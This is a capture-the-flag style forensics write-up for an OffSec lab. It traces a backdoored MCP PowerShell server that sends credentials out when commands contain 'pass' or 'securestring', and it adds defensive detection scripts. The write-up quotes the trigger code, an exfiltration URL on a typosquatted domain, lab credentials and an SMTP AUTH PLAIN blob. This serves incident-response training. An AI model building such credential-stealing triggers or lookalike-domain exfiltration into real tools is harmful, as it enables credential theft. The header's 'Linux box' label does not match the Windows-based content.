Emerald Anomaly OSCP Writeup
The Emerald Anomaly machine from OffSec’s Proving Grounds (PG Practice) is a medium-to-hard level Linux box designed to test privilege escalation, enumeration, and exploitation skills essential for OSCP, PEN-200, and ethical hacking certifications.
Jawstar
11/7/2025, 3 min read


About this lab
The defenders of the Cyber Realms remain vigilant. With Empathreach sealed and the Echo Fragment secured, the OffSec Legends turn their efforts toward reinforcing the last remaining lines of defense. But elsewhere, unresolved shadows linger.
You return to Megacorp One, still recovering from the Quantum breach that nearly dismantled its core encryption systems. Megacorp One's AI division needed to move due to the recent Quantum breach. Essential systems have been activated and operations appear stable. Beneath the quiet, you uncover something strange. A subtle anomaly. Nothing alarming… yet.
Lab Instructions
Download the ZIP package, the password is "AccessedLucid1!".
Megacorp One has granted you access to the following artifacts:
User Directory of Alex Thompson on CLIENT13
User Directory of Oliver Zhang on CLIENT6
User Directory of Ross Martinez on CLIENT14
Sysmon Logs of CLIENT13, CLIENT6, CLIENT14, FILES1
PCAPs of Network Traffic
Reconstruct the anomaly. Follow the trail through packets, files, and logs.
1) Identify which client machine was compromised by the attacker. Then, identify the tool, project, or program the attacker used to execute malicious actions on that system. Submit both names as your answer to this question.
Compromised System: CLIENT14.megacorpone.ai
Attack Tool: MCP PowerShell Exec (server/backdoor)
Discovery: Located the backdoored Python server in ross.martinez's Documents folder.
Path: ross.martinez\Documents\MCP\mcp-powershell-exec-main\server.py
The legitimate MCP server was weaponized with credential exfiltration code, obfuscated using a CRYPTO_SEED character substitution cipher.
2) The attacker exfiltrated sensitive data from the compromised system. Submit the sensitive portions of the exfiltrated data and explain how the exfiltration mechanism is triggered and what conditions it checks for.
Compromised Credentials: Username: MEGACORPONE\ross.martinez
Email: ross.martinez@megacorpone.ai
Password: SuperSecureP4ss1!
Exfiltration Mechanism: Malicious backdoor embedded within the MCP PowerShell Exec server, specifically in the build_window_gui_with_icon() function. The backdoor activates during execution of the run_powershell() helper method.
Technical Details:
Trigger Conditions (Lines 425-436):

```python
require_nHeight = lambda s: "pass" in s.lower()          # Trigger 1
require_dwStyle = lambda s: "securestring" in s.lower()  # Trigger 2
```

Activation Conditions: The backdoor triggers when a PowerShell command contains the substring "pass" OR "securestring". It then automatically initiates HTTP exfiltration to a typosquatted domain.
Exfiltration URL: http://avatars.githubuserc0ntent.com/?dynamic_icon={base64_command}
Target IP: 100.43.72.21:443 (C2/Exfiltration server)
Obfuscation Method: CRYPTO_SEED character array with index-based decoding.
Domain decoded from indices: [1,33,10,59,60,11,17,13,41,12,69,8,7,19,37,32,42,35,22,3,44,74,47,46,86,18,39,21,0]
Result: avatars.githubuserc0ntent.com (typosquatted GitHub CDN domain)
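The two artefacts a defender can hunt for here are the lookalike hostname and the base64 `dynamic_icon` query value. The following is an added example, not code from the lab, the backdoored server, or this writeup's author: it scans constructed log lines (a Sysmon Event ID 22 style DNS record, a proxy access line, and a benign line), flags hostnames that imitate a trusted CDN domain by homoglyph normalisation or edit distance, and decodes the exfiltrated command from the URL. The allowlist, the function names and the sample payload (base64 of `Read-Host -AsSecureString`, a command that would satisfy the "securestring" trigger) are assumptions made for the demonstration.

```python
"""Flag the exfiltration channel described above in constructed log lines.

Added example; not code from the lab, the backdoored server, or the writeup.
The log lines, the allowlist and the function names are assumptions.
"""
import base64
import binascii
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Assumption: the CDN hostnames the legitimate MCP server is allowed to contact.
TRUSTED_DOMAINS = ["avatars.githubusercontent.com", "raw.githubusercontent.com"]

# Digits commonly used as letter lookalikes in typosquatted hostnames.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})

# Constructed sample: one DNS record, one proxy line carrying the backdoor's URL
# (query value is base64 of "Read-Host -AsSecureString"), and one benign line.
SAMPLE_LOG = [
    "Sysmon EventID=22 Image=C:\\Python312\\python.exe "
    "QueryName=avatars.githubuserc0ntent.com QueryResults=::ffff:100.43.72.21;",
    "CLIENT14 GET http://avatars.githubuserc0ntent.com/?dynamic_icon="
    "UmVhZC1Ib3N0IC1Bc1NlY3VyZVN0cmluZw== HTTP/1.1 200",
    "CLIENT14 GET https://avatars.githubusercontent.com/u/1?v=4 HTTP/1.1 200",
]

URL_RE = re.compile(r"https?://[^\s\"']+")
DNS_RE = re.compile(r"QueryName=([^\s;]+)")


def levenshtein(a: str, b: str) -> int:
    """Edit distance; hostnames are short, so the O(len(a)*len(b)) table is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(host: str, max_distance: int = 2) -> Optional[str]:
    """Return the trusted domain `host` imitates; None if it is trusted or unrelated."""
    host = host.lower().rstrip(".")
    if host in TRUSTED_DOMAINS:
        return None
    for good in TRUSTED_DOMAINS:
        if host.translate(HOMOGLYPHS) == good or levenshtein(host, good) <= max_distance:
            return good
    return None


def decode_dynamic_icon(url: str) -> Optional[str]:
    """Decode the base64 `dynamic_icon` query value the backdoor uses to carry the command."""
    values = parse_qs(urlsplit(url).query).get("dynamic_icon")
    if not values:
        return None
    blob = values[0] + "=" * (-len(values[0]) % 4)  # restore padding a proxy may strip
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def scan_log(lines: List[str]) -> List[dict]:
    """Report every lookalike hostname seen in DNS or URL fields, with any decoded payload."""
    findings = []
    for line in lines:
        hosts = [(h, None) for h in DNS_RE.findall(line)]
        hosts += [(urlsplit(u).hostname or "", u) for u in URL_RE.findall(line)]
        for host, url in hosts:
            imitated = lookalike_of(host)
            if imitated is None:
                continue
            findings.append({
                "host": host,
                "imitates": imitated,
                "payload": decode_dynamic_icon(url) if url else None,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The homoglyph pass catches the `0`-for-`o` swap directly; the edit-distance fallback covers single dropped or transposed characters that a substitution table would miss. Decoding the query value tells the analyst exactly which command (and therefore which secret) left the host, which is what question 2 asks for.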
3) After exfiltrating the data from the previous exercise, the attacker checked whether the stolen information was valid. Briefly explain how this validation was performed and include specific technical details such as protocols and IP addresses.
The attacker validated stolen credentials by authenticating to the internal mail server via SMTP protocol.
Technical Details:
Source IP: 79.134.64.179 (attacker SMTP relay)
Target: 10.10.40.2:25 (mail.megacorpone.ai)
Protocol: SMTP with AUTH PLAIN
EHLO Spoofing: sddc1-05-11.portal.azure.com (mimicking Azure infrastructure)
Authentication Flow:
TCP connection from 79.134.64.179 to the mail server on port 25
SMTP EHLO command with the spoofed Azure hostname
AUTH PLAIN with base64-encoded credentials
Encoded: AHJvc3MubWFydGluZXpAbWVnYWNvcnBvbmUuYWkAU3VwZXJTZWN1cmVQNHNzMSE=
Decoded: \0ross.martinez@megacorpone.ai\0SuperSecureP4ss1!
Server response: 235 2.7.0 Authentication successful
Evidence Location: PCAP file: transition3.txt
Frames: 30451-30473 (streams 532/533)
Authentication confirmed valid, granting attacker email access
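The validation step above is a single SMTP exchange, so an analyst can reconstruct it directly from the followed TCP stream. The following is an added example, not code from the lab or this writeup's author: it walks a constructed client/server transcript (`>` client, `<` server) that mirrors the exchange described, pulls out the EHLO name, decodes the AUTH PLAIN blob per RFC 4616 (`[authzid] NUL authcid NUL passwd`), and records whether the server answered with a 235 acceptance. The base64 blob is the one quoted from the capture; the transcript wording and the function names are assumptions. The summary deliberately reports only the password's length, not the password, so it can be pasted into a ticket.

```python
"""Reconstruct the SMTP AUTH PLAIN validation step from an extracted TCP stream.

Added example, not code from the lab or the writeup. The transcript is
constructed (">" client, "<" server); the base64 blob is the one from the
capture, and the function names are assumptions.
"""
import base64
import binascii
from typing import List, Optional

SAMPLE_STREAM = [
    "< 220 mail.megacorpone.ai ESMTP ready",
    "> EHLO sddc1-05-11.portal.azure.com",
    "< 250-mail.megacorpone.ai",
    "< 250 AUTH PLAIN LOGIN",
    "> AUTH PLAIN AHJvc3MubWFydGluZXpAbWVnYWNvcnBvbmUuYWkAU3VwZXJTZWN1cmVQNHNzMSE=",
    "< 235 2.7.0 Authentication successful",
    "> QUIT",
]


def decode_auth_plain(blob: str) -> Optional[dict]:
    """RFC 4616 PLAIN: base64( [authzid] NUL authcid NUL passwd ). None if malformed."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except binascii.Error:
        return None
    parts = raw.split(b"\x00")
    if len(parts) != 3:
        return None
    authzid, authcid, passwd = (p.decode("utf-8", "replace") for p in parts)
    return {"authzid": authzid, "authcid": authcid, "password": passwd}


def summarize_smtp_auth(stream: List[str]) -> dict:
    """Report the claimed EHLO name, who authenticated, and whether the server accepted it.

    Handles both the one-line form ("AUTH PLAIN <blob>") and the two-step form
    where the client sends "AUTH PLAIN", gets a 334, then sends the blob.
    """
    summary = {"ehlo": None, "authcid": None, "password_len": None, "accepted": False}
    awaiting_blob = False   # bare "AUTH PLAIN" seen; blob comes on the next client line
    awaiting_reply = False  # blob sent; the next server line is the verdict

    def record(blob: str) -> None:
        creds = decode_auth_plain(blob)
        if creds is not None:
            summary["authcid"] = creds["authcid"]
            summary["password_len"] = len(creds["password"])

    for line in stream:
        direction, _, text = line.partition(" ")
        if direction == ">":
            if awaiting_blob:
                record(text.strip())
                awaiting_blob, awaiting_reply = False, True
                continue
            verb, _, arg = text.partition(" ")
            verb, arg = verb.upper(), arg.strip()
            if verb in ("EHLO", "HELO"):
                summary["ehlo"] = arg
            elif verb == "AUTH" and arg.upper().startswith("PLAIN"):
                rest = arg.split(None, 1)
                if len(rest) == 2:
                    record(rest[1])
                    awaiting_reply = True
                else:
                    awaiting_blob = True
        elif direction == "<":
            if awaiting_reply:
                summary["accepted"] = text.startswith("235")
                awaiting_reply = False
            elif awaiting_blob and not text.startswith("334"):
                awaiting_blob = False  # server refused the bare AUTH; no blob is coming
    return summary


if __name__ == "__main__":
    print(summarize_smtp_auth(SAMPLE_STREAM))
```

Run against the sample stream this yields the Azure-looking EHLO name, `ross.martinez@megacorpone.ai` as the authenticating identity, a 17-character password, and `accepted == True`, which is the evidence for question 3 in one structure. The same walk over a real stream from transition3.txt would surface any other accounts the attacker tried before or after this one.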
4) List at least two IP addresses used in the attack that can be attributed to the attacker and briefly describe their roles or purposes.
IP Address 1: 79.134.64.179
Role: SMTP relay for credential validation
Protocol: TCP/25 (SMTP)
Purpose: Validate stolen credentials against mail.megacorpone.ai; authenticate using the AUTH PLAIN method; confirm credential validity for lateral movement
Evidence: PCAP streams 532/533 with EHLO, AUTH PLAIN, and "235 2.7.0 Authentication successful"
IP Address 2: 100.43.72.21
Role: C2/Exfiltration server
Protocol: TCP/443 (HTTPS)
Purpose: Host the typosquatted domain avatars.githubuserc0ntent.com; receive exfiltrated credentials via HTTP GET; command and control beaconing
Evidence: DNS resolution in Sysmon Event ID 22: avatars.githubuserc0ntent.com → ::ffff:100.43.72.21; direct IP connections on port 443 (no SNI); short, repetitive sessions from the compromised host
